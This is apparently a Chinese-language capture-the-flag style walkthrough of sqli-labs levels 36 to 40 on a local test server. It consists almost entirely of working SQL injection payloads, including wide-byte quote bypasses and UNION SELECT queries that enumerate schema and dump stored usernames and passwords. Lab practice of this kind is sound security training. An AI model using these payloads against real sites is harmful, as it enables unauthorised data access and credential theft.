第三六关 less-36
宽字节注入
步骤一:闭合方式?id=1%df%27%20--+
步骤二:查看数据库名
http://127.0.0.1/less-36/?id=-1%df%27%20union%20select%201,database(),3%20--+
步骤三:查看表名
http://127.0.0.1/less-36/?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+
步骤四:查看users表中列名
http://127.0.0.1/less-36/?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273%20--+
步骤五:查看信息
第三七关 less-37
步骤一:输入Username:admin Password:admin 利用Burp抓包
步骤二:查看数据库
uname=-1%df'union select 1,database()#
步骤三:查看表名
uname=-1%df%27%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()#
步骤四:查看users表中列名
uname=-1%df'union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#
步骤五:查看users表中信息
-1%df'union select 1,group_concat(id,username,password) from users #
第三八关 less-38
步骤一:闭合方式?id=1' --+
步骤二:查询数据库
?id=-1' union select 1,2,database()--+
步骤三:查看表名
?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
步骤四:查询users表中列名
?id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273--+
步骤五:查看users表中信息
?id=-1' union select 1,group_concat(password,username),3 from users--+
第三九关 less-39
步骤一:闭合方式?id=1 --+
步骤二:查询数据库
?id=-1 union select 1,2,database()--+
步骤三:查看表名
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
步骤四:查询users表中列名
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
步骤五:查看users表中信息
?id=-1 union select 1,group_concat(password,username),3 from users--+
第四十关 less-40
步骤一:闭合方式??id=1') --+
步骤二:查询数据库
?id=-1') union select 1,2,database()--+
步骤三:查看表名
?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
步骤四:查询users表中列名
?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
步骤五:查看users表中信息
?id=-1') union select 1,group_concat(password,username),3 from users--+